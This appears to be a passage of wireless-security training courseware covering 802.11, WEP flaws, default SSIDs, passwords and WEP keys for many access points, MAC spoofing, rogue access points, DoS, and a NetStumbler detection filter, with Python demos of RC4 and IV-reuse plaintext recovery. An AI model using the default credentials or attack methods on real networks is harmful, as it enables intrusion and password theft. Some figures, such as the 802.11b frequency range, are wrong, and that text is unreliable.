Module Objectives


Wireless enables better communication, enhances productivity and enables better customer service. A wireless LAN allows users to access information beyond their desk and conduct business anywhere within their offices. But with this come several security concerns that must be addressed. On completion of this module you will be familiar with the following topics.

  • Introduction to 802.11

  • What is WEP?

  • Finding WLANs

  • Cracking WEP Keys

  • Sniffing Traffic

  • Wireless DoS attacks

  • WLAN Scanners

  • WLAN Sniffers

  • Securing Wireless Networks

  • Hacking Tools

start sidebar
Introduction to Wireless Networking
  • Wireless networking technology is becoming increasingly popular but at the same time has introduced many security issues

  • The popularity in wireless technology is driven by two primary factors - convenience and cost.

  • A Wireless local area network (WLAN) allows workers to access digital resources without being locked into their desks.

  • Laptops can be carried into meetings or even into a Starbucks cafe and tap into the wireless network. This convenience has become affordable.

end sidebar
 
Concept  

A wireless LAN is one in which a mobile user can connect to a local area network (LAN) through a wireless (radio) connection. A standard, IEEE 802.11, specifies the technologies for wireless LANs. The standard includes an encryption method, the Wired Equivalent Privacy algorithm.

A wireless LAN offers a feasible way to provide data connectivity to an existing building where wiring may not be practical due to construction design, location or expense involved. Apart from offering mobility and hence freedom from location restraints, WLANs are gaining popularity due to their ease of use. Typical problems associated with the physical aspects of wired LAN connections do not arise as frequently with a wireless network.

Nevertheless, WLANs do raise the issue of security due to certain inherent features, such as radio waves being easier to intercept than physical wires. Though the user authentication and data encryption system known as Wired Equivalent Privacy (WEP) is used, by itself it falls far short of providing adequate security. Despite the fact that WEP was never intended to provide security, only privacy, most WLANs have been seen to rely on it for security.

Another point to bear in mind is that each access point in a Wi-Fi network shares a fixed amount of bandwidth among all the users who are currently connected to it on a first-come, first-served basis. Since one of the major benefits of wireless networking is user mobility, an important issue to consider is whether users can move seamlessly between access points without having to log in again and restart their applications.

Seamless roaming is only possible if the access points have a way of exchanging information as a user connection is handed off from one to another. Most large corporate data networks are divided into a number of smaller pieces called subnets for traffic management and security reasons. In many instances wireless LAN vendors provide seamless roaming within a single subnet, but not when a user moves from one subnet to another.

However, such solutions are expensive and integrating the various components requires a considerable amount of patient networking expertise. The objective is to deploy and maintain secure, high performance wireless LANs with a minimum amount of time, effort and expense. Wireless networks and access points (APs) are some of the simplest and least expensive types of targets to footprint and also some of the hardest to detect and scrutinize.

start sidebar
What is 802.11X?
  • Wireless LAN standards are defined by the IEEE's 802.11 working group. WLANs come in three flavors:

  • 802.11b

    • Operates in the 2.4000 GHz to 2.2835 GHz frequency range and can operate at up to 11 megabits per second.

  • 802.11a

    • Operates in the 5.15-5.35 GHz to 5.725-5.825 GHz frequency range and can operate at up to 54 megabits per second.

  • 802.11g

    • Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at up to 54 megabits per second.

    Note  

    WEP standards are defined in the 802.11 standard and not the individual standards. WEP vulnerabilities have the potential to affect all flavors of 802.11 networks.

end sidebar
 
Note  

For starters, 802.11 is a standard by IEEE on which wireless LANs are based, allowing cross-vendor products to interact seamlessly with each other. Let us take a look at how this standard works. 802.11 wireless networks should not be confused with Bluetooth, which was developed by a commercial coalition including Ericsson, Motorola, and Microsoft.

According to this standard, data is encoded using DSSS (direct-sequence spread-spectrum) technology. DSSS works by taking a data stream of zeros and ones and modulating it with a second pattern, termed the chipping sequence. Chipping spreads modulated data across the spectrum in a fashion that makes it possible to tolerate some signal loss.

When this standard was introduced in 1997, the chipping sequence chosen was the Barker code. This is an 11-bit sequence (10110111000) that generates a carrier wave, modulated with Binary or Quadrature Phase Shift Keying (B/QPSK). Modulating with BPSK yields 1 Mbps, while modulating the direct sequence with QPSK yields 2 Mbps.

The basic data stream is exclusive OR'd with the Barker code to generate a series of data objects called chips. Each bit is then "encoded" by the 11-bit Barker code, and each group of 11 chips goes on to encode one bit of data.
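An added worked example (not code from the module) of the Barker-code chipping just described: each data bit is XORed with the 11-chip sequence, and the receiver recovers a bit from each 11-chip group. A simple majority vote stands in for the real correlator, which is enough to show why a few corrupted chips are tolerated.

```python
# Barker-code spreading and despreading, as described in the text above.
BARKER_11 = [1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0]   # the 802.11 DSSS chipping sequence


def spread(bits):
    """Map each data bit to 11 chips: chip = data_bit XOR barker_chip."""
    return [b ^ c for b in bits for c in BARKER_11]


def despread(chips):
    """Recover one bit per 11-chip group. XORing a clean group with the Barker
    code gives eleven 0s (bit 0) or eleven 1s (bit 1); with noise, the majority
    of the eleven chips decides, so up to five chip errors per bit are absorbed."""
    if len(chips) % 11:
        raise ValueError("chip stream is not a whole number of 11-chip groups")
    bits = []
    for start in range(0, len(chips), 11):
        group = chips[start:start + 11]
        ones = sum(c ^ k for c, k in zip(group, BARKER_11))
        bits.append(1 if ones > 5 else 0)
    return bits


def flip_chips(chips, positions):
    """Simulate channel errors by inverting the chips at the given positions."""
    out = list(chips)
    for p in positions:
        out[p] ^= 1
    return out


def bytes_to_bits(data):
    """Big-endian bit expansion, MSB first."""
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]


def bits_to_bytes(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


if __name__ == "__main__":
    chips = spread(bytes_to_bits(b"Hi"))            # 16 bits -> 176 chips
    noisy = flip_chips(chips, [0, 3, 7, 11, 20])     # a few errors in the first two groups
    print(bits_to_bytes(despread(noisy)))            # still b"Hi"
```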

 

Feature                   | 802.11       | 802.11a                            | 802.11b               | 802.11g
Frequency                 | 2.4GHz       | 5GHz                               | 2.4GHz                | 2.4GHz
Rate(s)                   | 1 or 2 Mbps  | 6, 9, 12, 18, 24, 36, 48, 54 Mbps  | 1, 2, 5.5 or 11 Mbps  | 6, 9, 12, 18, 24, 36, 48, 54 Mbps
Modulation                | FHSS/DSSS    | OFDM                               | DSSS                  | OFDM
Effective Data Throughput | 1.2 Mbps     | 32 Mbps                            | 5 Mbps                | 32 Mbps
Advertised Range          | 300 ft       | 225 ft                             | 300 ft                | 300 ft
Encryption?               | Yes          | Yes                                | Yes                   | Yes
Encryption Type           | 40 bit RC4   | 40 or 104-bit RC4                  | 40 or 104-bit RC4     | 40 or 104-bit RC4
Authentication            | No           | No                                 | No                    | No
Network Support           | Ethernet     | Ethernet                           | Ethernet              | Ethernet

802.11b - 2.4GHz, 11Mbps

The 802.11b standard uses the 2.4GHz band. 802.11b maintains compatibility with the DSSS spectrum and incorporates an additional coding scheme, called complementary code keying (CCK), to attain a top-end data rate of 11Mbps. A second coding scheme, packet binary convolutional code (PBCC), was included as an option at the 5.5 and 11Mbps rates. The CCK modulation technique is a single carrier approach: the signal waveform occupies the entire 22MHz channel, and the data is carried on the full channel waveform. It is important to realize that the 11Mbps rate represents maximum raw bandwidth.

802.11g - 2.4GHz, 54Mbps

The new standard 802.11g operates at the 2.4GHz band delivering 54Mbps. The standard uses the CCK-OFDM technique with optional mode of PBCC. It is specified to be backward compatible with 802.11b standard. Some vendor chipsets for wireless incorporate the 802.11g draft standard's mandatory modulation schemes, including Complementary Code Keying (CCK), used in 802.11b, and Orthogonal Frequency Division Multiplexing (OFDM), used in 802.11a transmissions. Using CCK ensures backward-compatibility with the installed 802.11b base, while OFDM provides the speed required for today's high-bandwidth applications.

802.11a - 5GHz, 54Mbps

802.11a uses the 5GHz band to achieve data rates of 54Mbps. It uses Orthogonal Frequency Division Multiplexing (OFDM). Because it uses the 5GHz spectrum and a different modulation method, it is not interoperable with the 802.11b standard. OFDM is a multi-carrier approach in which the channel is segmented into a number of small sub-channels, and the data is divided among these multiple carrier signals. The OFDM radio uses two schemes, binary phase shift keying (BPSK) and quadrature phase shift keying (QPSK), depending on the data rate; BPSK and QPSK are used for data rates up to 18 Mbps.

From 18Mbps to 54Mbps, a different coding scheme called quadrature amplitude modulation (QAM) is used. The attraction of 802.11a's 5GHz band is that it offers more channels than the 2.4GHz band used by 802.11b: the 54Mbps radio provides 8 non-overlapping channels compared to 3 non-overlapping channels for the 11Mbps radios. However, 5GHz consumes more power and the range is restricted compared to the 2.4GHz band. Additionally, up to 95 percent of the worldwide WLAN market currently has an installed base of 11Mbps radios.

start sidebar
Setting Up WLAN
  • When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network settings such as IP address and a subnet mask.

  • The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the frequency on which the network will operate.

  • The SSID is an alphanumeric string that differentiates networks operating on the same channel.

  • It is essentially a configurable name that identifies an individual network. These settings are important factors when identifying WLANs and sniffing traffic.

end sidebar
 
Note  

Each set of wireless devices communicating directly with each other is called a basic service set (BSS). Several BSSs can be joined together to form one logical WLAN segment, referred to as an extended service set (ESS). A Service Set Identifier (SSID) is simply the 1-32 byte alphanumeric name given to each ESS. SSID helps devices to establish and maintain wireless connectivity with an appropriate access point when multiple independent networks operate in the same physical area. An SSID is also referred to as a Network Name because essentially it is a name that identifies a wireless network.

For example, a departmental WLAN (ESS) may consist of several access points (APs) and dozens of stations, all using the same SSID. Another organization in the same building may operate its own departmental WLAN, composed of APs and stations using a different SSID.

Each AP advertises its presence several times per second by broadcasting beacon frames that carry the ESS name (SSID). Stations can discover APs by passively listening for beacons, or they can send probe frames to actively search for an AP with the desired SSID. Once the station locates an appropriately named AP, it can send an associate request frame containing the desired SSID. The AP replies with an associate response frame, also containing the SSID.

Some frames are permitted to carry a null (zero length) SSID, called a broadcast SSID. For example, a station can send a probe request that carries a broadcast SSID; the AP must return its actual SSID in the probe response. Some APs can be configured to send a zero-length broadcast SSID in beacon frames instead of sending their actual SSID. However, it is not possible to keep an SSID value secret, because the actual SSID (ESS name) is carried in several frames.

start sidebar
SSIDs
  • The SSID is a unique identifier that wireless networking devices use to establish and maintain wireless connectivity

  • The SSID acts as a single shared password between access points and clients.

  • Security concerns arise when the default values are not changed, as these units can be easily compromised.

  • A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any."

end sidebar
 

We have seen that the service set identifier (SSID) is a 32-character unique identifier attached to the header of packets sent over a WLAN that acts as a password when a mobile device tries to connect to the BSS (Basic Service Set). The SSID differentiates one WLAN from another. Therefore, access points and all devices attempting to connect to a specific WLAN must use the same SSID. A device will not be permitted to join the BSS unless it can provide the unique SSID. Because an SSID can be sniffed in plain text from a packet it does not supply any security to the network.

Multiple access points on a network or sub-network can use the same SSID. SSIDs are case sensitive and can contain up to 32 alphanumeric characters. With proper configuration, only clients with the correct SSID can communicate with access points. Access points come with default SSIDs. Security concerns arise when the default values are not changed, as these units can be easily compromised.

SSIDs are transmitted as clear text, exposing them to capture by an attacker monitoring the network's traffic. The 'Secure Access mode' requires the SSID of both client and access point to be synchronized. The default option is off. A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any."

Attack Methods  

From the attacker's perspective, if the target access point responds to a broadcast SSID probe, then he might just be in luck. This is because most wireless card drivers are configured with an SSID of ANY so that they will be able to associate with any wireless network. When the SSID is set to ANY, the driver sends a probe request to the broadcast address with a zero-length SSID, causing most access points that respond to such requests to reply with their SSID and other information. Though this configuration makes it easier for the user, who does not have to remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers to gather SSIDs. Some of the common default SSIDs and passwords are:

3Com AirConnect 2.4 GHz DS (newer 11mbit, Harris/Intersil Prism based)

Default SSID: 'comcomcom'

3Com other Access Points

Default SSID: '3com'

Addtron (Model:?)

Default SSID: 'WLAN'

Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/ e and BR4800

Default SSID: 'tsunami'; '2'

Console Port: No Default Password

Telnet password: No Default Password

HTTP management: On by default, No Default Password

Apple Airport

Default SSID: 'AirPort Network'; 'AirPort Netzwerk'

BayStack 650/660 802.11 DS AP

Default SSID: 'Default SSID'

Default admin pass: <none>

Default Channel: 1

MAC addr: 00:20:d8:XX:XX:XX

Compaq WL-100/200/300/400

Default SSID: 'Compaq'

Dlink DL-713 802.11 DS Access Point

Default SSID: 'WLAN'

Default Channel: 11

Default IP address: DHCP-administered

INTEL Pro/Wireless 2011 802.11 DSSS - PC Card

Default SSID: '101' ; 'xlan' ; 'intel' ; '195'

Default Channel: 3

INTEL Pro/Wireless 2011 802.11 DSSS - Access Point

Default SSID: '101' ; '195'

LINKSYS WAP-11 802.11 DS Access Point

Default SSID: 'linksys'

Default Channel: 6

Default WEP key one: 10 11 12 13 14 15

Default WEP key two: 20 21 22 23 24 25

Default WEP key three: 30 31 32 33 34 35

Default WEP key four: 40 41 42 43 44 45

LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card

Default SSID: 'linksys' ; 'Wireless'

Default Channel: 3 ; 6 ; 11

Netgear 802.11 DS ME102 / MA401

Default SSID: 'wireless'

Default Channel: 6

Default IP address: 192.168.0.5

Default WEP: Disabled

Default WEP KEY1: 11 11 11 11 11

Default WEP KEY2: 20 21 22 23 24

Default WEP KEY3: 30 31 32 33 34

Default WEP KEY4: 40 41 42 43 44

Default MAC: 00:30:ab:xx:xx:xx

SMC Access Point Family SMC2652W

Default SSID: 'WLAN'

Default Channel: 11

Default HTTP: user: default pass: WLAN_AP

Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx)

Console Port: No Password, AT command set

SMC 2526W Wireless Access Point Dual-Dipole

Default SSID: 'WLAN'

Default IP: 192.168.0.254

Default MAC: 00:90:d1:00:11:11(00:90:d1:xx:xx:xx)

Default AP Name: MiniAP

Default Channel: 11

Default Admin Pass: MiniAP

SMC 2682W EZ-Connect Wireless Bridge

Default SSID: 'BRIDGE'

Default Channel: 11

Default Admin pass: WLAN_BRIDGE

Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)

SOHOware NetBlaster II

Default SSID: same as mac

Default MAC:00:80:c6:xx:xx:xx

Default Channel:8

Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS

Default SSID: '101'

Default MAC: 00:a0:0f:xx:xx:xx

Default WEP key one: 10 11 12 13 14 15

Default WEP key two: 20 21 22 23 24 25

Default WEP key three: 30 31 32 33 34 35

Default WEP key four: 40 41 42 43 44 45

TELETRONICS WL-Access Point

Default SSID: 'any'

Default Password: 1234

Console Port: No password, AT command set

Wave Lan Family

Default SSID: 'WaveLAN Network'

Default channel: 3

ZCOMAX Access Point XWL450

Default SSID: 'any'; 'mello' ; 'Test'

Default password: 1234

Console Port: No Password, AT command set

ZYXEL Prestige 316 Gateway/Natbox/WirelessBridge

Default SSID: 'Wireless'

Default Channel: 1

Default console pass: 1234

Default telnet pass: 1234

Console Port: Same password for system, ansi/vt100 terminal

1stWave Access Points

Default SSID: '1stWave'

ELSA Lancom Wireless L-11 / AirLancer

Default SSID: 'ELSA'

start sidebar
What is WEP?
  • WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs.

  • Wired LANs typically employ physical controls to prevent unauthorized users from connecting to the network and viewing data. In a wireless LAN, the network can be accessed without physically connecting to the LAN.

  • IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping on a network. This is accomplished by encrypting data with the RC4 encryption algorithm.

end sidebar
 
Concept  

Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. WEP is 802.11's optional encryption standard implemented in the MAC Layer that most radio network interface card (NIC) and access point vendors support.

Role of WEP in Wireless Communication

WEP is used to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. Though this function has not been explicitly mentioned in the 802.11 standard, it is generally considered to be a feature of WEP.

WEP relies on a secret key that is shared between a mobile station (e.g. a laptop with a wireless Ethernet card) and an access point (i.e. a base station). The secret key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit.

If a user activates WEP, the NIC encrypts the payload (frame body and CRC) of each 802.11 frame before transmission using an RC4 stream cipher provided by RSA Security. The receiving station, such as an access point or another radio NIC, performs decryption upon arrival of the frame. As a result, 802.11 WEP only encrypts data between 802.11 stations. Once the frame enters the wired side of the network, such as between access points, WEP no longer applies.

Note  

Working of WEP and Security Concern

WEP uses the RC4 encryption algorithm, which is a stream cipher. A stream cipher operates by expanding a short key into an infinite pseudo-random key stream. Before transmission takes place, WEP combines the key stream with the payload/ICV through a bitwise XOR process, which produces ciphertext (encrypted data). XORing the key stream with the ciphertext yields the original plaintext. WEP includes the IV in the clear (unencrypted) within the first few bytes of the frame body. The receiving station uses this IV along with the shared secret key supplied by the user of the receiving station to decrypt the payload portion of the frame body.

In most cases the sending station will use a different IV for each frame. If the same key were used on its own, the beginning of each encrypted payload would be identical whenever the plaintext began the same way, offering a pattern that can help attackers in cracking the encryption. WEP guards against this by allowing a different IV to be used for each frame, even though the key stays the same.

Threat  

However, the 802.11b standard does not discuss how the shared key is established in practice. Typically, most installations use a single key that is shared between all mobile stations and access points. This raises a security concern: an attacker can flip a bit in the ciphertext so that, upon decryption, the corresponding bit in the plaintext is also flipped.

Moreover, if he can intercept two ciphertexts encrypted with the same key stream, he can obtain the XOR of the two plaintexts. Knowledge of this XOR can enable statistical attacks to recover the plaintexts. The probability of success of statistical attacks increases in direct proportion to the number of ciphertexts using the same key stream. It becomes a trivial exercise to recover all plaintexts once the attacker knows one of them. Let us look at why this is possible.

Note  

Encryption Process

As part of the encryption process, WEP prepares a key schedule ("seed") by concatenating the shared secret key supplied by the user of the sending station with a random-generated 24-bit initialization vector (IV). The IV lengthens the life of the secret key because the station can change the IV for each frame transmission. WEP inputs the resulting "seed" into a pseudo-random number generator (PRNG) that produces a key stream equal to the length of the frame's payload plus a 32-bit integrity check value (ICV).

The ICV is a checksum that the receiving station recalculates and compares to the one sent by the sending station to determine whether the transmitted data underwent any form of tampering while in transit. If the receiving station calculates an ICV that doesn't match the one found in the frame, then the receiving station can reject the frame or flag the user.

WEP specifies a shared secret 40 or 64-bit key to encrypt and decrypt the data. Some vendors also include 128-bit keys (known as "WEP2") in their products. With WEP, the receiving station must use the same key for decryption. Each radio NIC and access point, therefore, must be manually configured with the same key.

Before transmission takes place, WEP combines the key stream with the payload/ICV through a bitwise XOR process, which produces ciphertext (encrypted data). WEP includes the IV in the clear (unencrypted) within the first few bytes of the frame body. The receiving station uses this IV along with the shared secret key supplied by the user of the receiving station to decrypt the payload portion of the frame body.
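An added worked example (not code from the module) of the encryption process just described, with RC4 implemented inline: the seed is IV || secret key, the ICV is CRC-32 of the payload (little-endian byte order is assumed here), and the IV travels in the clear. The last function shows the keystream-reuse weakness from the Threat paragraph above: two frames that share an IV share a keystream, so XORing their ciphertexts yields the XOR of the plaintexts without any knowledge of the key.

```python
import zlib
from typing import Optional


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Expand `key` into `length` bytes of RC4 keystream (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bitwise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """32-bit integrity check value: CRC-32 of the payload (little-endian assumed)."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(secret_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: IV in the clear || (payload || ICV) XOR RC4(IV || secret key)."""
    if len(iv) != 3 or len(secret_key) not in (5, 13):
        raise ValueError("IV must be 24 bits and the key 40 or 104 bits")
    keystream = rc4_keystream(iv + secret_key, len(payload) + 4)
    return iv + xor_bytes(payload + icv(payload), keystream)


def wep_decrypt(secret_key: bytes, frame_body: bytes) -> bytes:
    """Reverse wep_encrypt; raise if the recomputed ICV does not match the received one."""
    iv, ciphertext = frame_body[:3], frame_body[3:]
    plain = xor_bytes(ciphertext, rc4_keystream(iv + secret_key, len(ciphertext)))
    payload, received_icv = plain[:-4], plain[-4:]
    if icv(payload) != received_icv:
        raise ValueError("ICV mismatch: frame modified in transit or wrong key")
    return payload


def plaintext_xor_from_iv_reuse(body_a: bytes, body_b: bytes) -> Optional[bytes]:
    """Two frames with the same IV (and the same static key) were encrypted with the
    same keystream; XORing the ciphertexts cancels it and leaves P_a XOR P_b."""
    if body_a[:3] != body_b[:3]:
        return None                            # different IV, different keystream
    n = min(len(body_a), len(body_b))
    return xor_bytes(body_a[3:n], body_b[3:n])


if __name__ == "__main__":
    KEY = bytes.fromhex("0a0b0c0d0e")          # constructed 40-bit shared key
    IV = bytes.fromhex("010203")               # constructed 24-bit IV
    body = wep_encrypt(KEY, IV, b"GET /index.html")
    print(wep_decrypt(KEY, body))
    other = wep_encrypt(KEY, IV, b"GET /login.html")   # same IV reused
    print(plaintext_xor_from_iv_reuse(body, other).hex())
```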

We will consider the 64-bit key generator here. In the figure below, the ASCII text "PassPhrase" is mapped to a 32-bit value with XOR. The XOR operation guarantees four zero bits: since the input is ASCII, the high bit of each character is always zero, and the XOR of these high bits is also zero. Therefore only seeds from 00:00:00:00 through 7f:7f:7f:7f can occur.


The resultant value is used as the seed to a 32-bit linear congruential PRNG (pseudo-random number generator). Forty values are generated from the PRNG, and one byte is taken from each 32-bit result: for each 32-bit output, only bits 16 through 23 are used. The flaw is that in a linear congruential generator modulo 2^32 the low bits are "less random" than the higher bits. Bit 0 has a cycle length of 2^1, bit 3 has a cycle length of 2^4, and so on, so the bytes taken from bits 16 through 23 can have a cycle length of at most 2^24. Consequently only seeds 00:00:00:00 through 00:ff:ff:ff result in unique keys. Combined with the zero high bits, this implies that the 64-bit key generator has an entropy of 21 bits, as the number of unique keys that can be generated is 2^21.

Threat  

Security Issues

WEP is vulnerable because of relatively short IVs and keys that remain static. It is not the RC4 algorithm that is at fault, but the fact that the entropy of the key generator is only 21 bits. With only 24 bits of IV, WEP ultimately uses the same IV for different data packets.

This means that the chance of a collision is high. For instance, in a large and busy network this can happen within an hour or so due to the reoccurrence of IVs, which results in the transmission of frames encrypted with identical keystreams. If an attacker manages to collect enough frames based on the same IV (a minimum of two packets), he can determine the values they share, i.e., the keystream or the shared secret key.

He can therefore decrypt any of the 802.11 frames. The static nature of the shared secret keys only adds to this problem. 802.11 does not provide any functions that support the exchange of keys among stations. As a result, system administrators and users generally use the same keys for weeks, months, and even years.
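An added worked example (not from the module) that puts numbers on the IV-collision argument above, assuming IVs are chosen uniformly at random by each sender (the birthday bound) or incremented sequentially by one station at an assumed frame rate.

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS            # 16,777,216 possible WEP IVs


def iv_collision_probability(frames: int) -> float:
    """Chance that at least two of `frames` frames reuse an IV when every sender draws
    IVs uniformly at random; one such pair is all keystream reuse needs."""
    if frames > IV_SPACE:
        return 1.0                 # pigeonhole: more frames than IVs
    # sum the logs rather than multiplying (1 - i/N) terms, to avoid underflow
    log_p_no_collision = sum(math.log1p(-i / IV_SPACE) for i in range(frames))
    return 1.0 - math.exp(log_p_no_collision)


def frames_until_probability(target: float) -> int:
    """Smallest frame count at which the random-IV collision probability reaches `target`."""
    log_p = 0.0
    frames = 0
    while 1.0 - math.exp(log_p) < target:
        log_p += math.log1p(-frames / IV_SPACE)
        frames += 1
    return frames


def hours_to_exhaust_ivs(frames_per_second: float) -> float:
    """A station that increments its IV sequentially must repeat after 2^24 frames."""
    return IV_SPACE / frames_per_second / 3600.0


if __name__ == "__main__":
    print(frames_until_probability(0.5))        # a few thousand frames for a 50% chance
    print(round(hours_to_exhaust_ivs(500), 2))  # sequential IVs at 500 frames/s
```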

Note  

Issues Plaguing WEP Key Management

  • Keys are manually distributed

  • Keys are statically configured (therefore infrequently changed and easy to remember)

  • It uses four 40-bit keys (or one 104-bit key)

  • Key values can be directly set as hex data

  • Key generators are provided for convenience. Note that an ASCII string is converted into keying material. Though not specified by the standard, this is widely used. There are different key generators for 64- and 128-bit encryption. [1]

start sidebar
MAC Sniffing & AP Spoofing
  • MAC addresses are easily sniffed by an attacker since they must appear in the clear even when WEP is enabled.

  • An attacker can use those "advantages" in order to masquerade as a valid MAC address by programming the wireless card, and get into the wireless network and use the wireless pipes.

  • Spoofing a MAC address is very easy. Using packet-capturing software, an attacker can determine a valid MAC address from a single packet.

  • To perform a spoofing attack, an attacker must set up an access point (rogue) near the target wireless network or in a place where a victim may believe that wireless Internet is available.

end sidebar
 

Most vendors have implemented MAC-level access controls to add security to 802.11. This provides added security if the admin defines a list of "approved" client MAC addresses that will be allowed to connect to the access point. This is not always practical in large networks. Besides, the MAC address does not provide a good security mechanism because it is both easily observable and reproducible.

Attack Methods  

Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker because they appear in the clear. Moreover, it is possible to change the MAC address on wireless cards using suitable software. An attacker can use this to masquerade as a valid MAC address by programming the wireless card and accessing the wireless network. Therefore, any MAC can be sniffed off the network with a wireless sniffer, and the attacker's MAC address can be changed easily in most cases.

Attack Methods  

An attacker will be able to spoof a connection if he holds wireless equipment and is near a wireless network. To do this he must first set up an access point near the target wireless network or in a place where the victim believes wireless Internet to be available. If the attacker's access point has a stronger signal than the real access point, then the victim's computer will connect to the attacker's access point. Once the victim establishes the connection, the attacker can steal his password and network access, compromise his computer, and so on. This attack is used mainly for password acquisition.

start sidebar
Denial of Service attacks
  • Wireless LANs are susceptible to the same protocol-based attacks that plague wired LANs.

  • WLANs send information via radio waves on public frequencies, thus they are susceptible to inadvertent or deliberate interference from traffic using the same radio band.

end sidebar
 

Wireless networks are extremely vulnerable to DoS attacks. Such attacks can slow the network to crawling speeds or actually force it to quit working. In the "brute force" DoS attack method, a huge flood of packets can use up all of the network's resources and force it to shut down, or a very strong radio signal that totally dominates the airwaves can render access points and radio cards useless.

A hacker can initiate a packet-based brute force DoS attack by using other systems on the network to send the useless packets to the server. This adds significant overhead on the network and takes away useable bandwidth from legitimate users.

Note  

A DoS occurrence on a wireless network may not be deliberate. 802.11b resides in a shared spectrum; other 2.4GHz devices such as cordless phones, microwaves and Bluetooth may cause a significant reduction in 802.11b functioning. To illustrate the vulnerability, place a laptop with an 802.11b NIC next to a microwave oven. As both devices usually use the 2.4 GHz band, signal degradation on the 802.11b network is likely to occur any time the microwave is in operation. An attacker could use the same principle to disable or degrade an 802.11b network by broadcasting traffic on the same frequency as the network. Wi-Fi Protected Access (WPA) is vulnerable to a type of DoS attack.

WPA uses mathematical algorithms to authenticate users to the network. If a user is trying to get in and sends two packets of unauthorized data within one second, WPA will assume it is under attack and shut down. While this safeguards against security breaches, it allows the attacker to cause damage by sending data frames cyclically, causing constant shutdowns.

start sidebar
Hacking Tool: NetStumbler

http://www.netstumbler.org

  • NetStumbler is a high level WLAN scanner. It operates by sending a steady stream of broadcast packets on all possible channels.

  • Access Points (AP) respond to broadcast packets to verify their existence, even if beacons have been disabled.

  • NetStumbler displays:

    1. Signal Strength

    2. MAC Address

    3. SSID

    4. Channel details

end sidebar
 
Tools  

NetStumbler, written by Marius Milner, scans and logs the name, signal strength and other technical details of any 802.11b wireless networks it finds. NetStumbler works by utilizing active scanning techniques through the use of probe requests sent to a broadcast address with a broadcast BSSID and an unspecified ESSID (length of 0).

NetStumbler is a Windows-based war-driving tool that will detect wireless networks and mark their relative position with a GPS. NetStumbler uses an 802.11 Probe Request sent to the broadcast destination address, causing all access points in the area to issue an 802.11 Probe Response containing network configuration information, such as their SSID and WEP status. When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal strength found for each access point. Using the network and GPS data, the user can create maps with tools such as Microsoft MapPoint.

NetStumbler supports the Hermes chipset cards on Windows 2000, the most popular being the Lucent (now Proxim) Orinoco branded cards. On Windows XP the NDIS 5.1 networking library has 802.11 capabilities itself, which allows NetStumbler to be used with most cards that support it. To use NetStumbler, the user inserts his wireless card and sets his SSID or network name to ANY. As discussed before, this instructs the driver to use a zero-length SSID in its Probe Requests, causing most access points to respond to Probe Requests along with their SSID or a zero-length SSID.

The probe requests are difficult to distinguish from legitimate client activity because NetStumbler uses the active scanning method described in the IEEE 802.11 specification without anomalous characteristics. Once an AP is discovered, NetStumbler will probe the AP for its information, often the same information stored in the SNMP MIB system.sysName.0 parameter.

Note  

How does one detect NetStumbler activity? NetStumbler's primary weakness is that it relies on a single discovery method: the broadcast Probe Request followed by an LLC/SNAP-encapsulated data frame sent to each AP it finds. That LLC/SNAP frame has unique characteristics that identify NetStumbler. The LLC-encapsulated frames generated by NetStumbler use an organizationally unique identifier (OUI) of 0x00601d and a protocol identifier (PID) of 0x0001. NetStumbler also uses a data payload of 58 bytes containing a string that identifies the NetStumbler version.

Each NetStumbler version has a typical payload string. For instance, version 3.2.0 carries 'Flurble gronk bloopit, bnip Frundletrune'; 3.2.3 uses 'All your 802.11b are belong to us'; 3.3.0 has a payload string that is intentionally left blank. To identify NetStumbler traffic one can use the following Ethereal display filter, which matches data frames carrying that OUI and PID and any of the three payload patterns:

(wlan.fc.type_subtype eq 32 and llc.oui eq 0x00601d and llc.pid eq 0x0001) and (data[4:4] eq 41:6c:6c:20 or data[4:4] eq 6c:46:72:75 or data[4:4] eq 20:20:20:20)
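What that filter expresses, as an added Python example (not code from the courseware or from NetStumbler): it parses unencrypted 802.11 data frames, checks for the LLC/SNAP OUI and PID quoted in the note, and maps the 58-byte payload to a version string. The sample frames are constructed here; the address layout of the header, the exact payload layout (four leading bytes, then the string, space-padded) and the MAC addresses are assumptions made for the example.

```python
import struct

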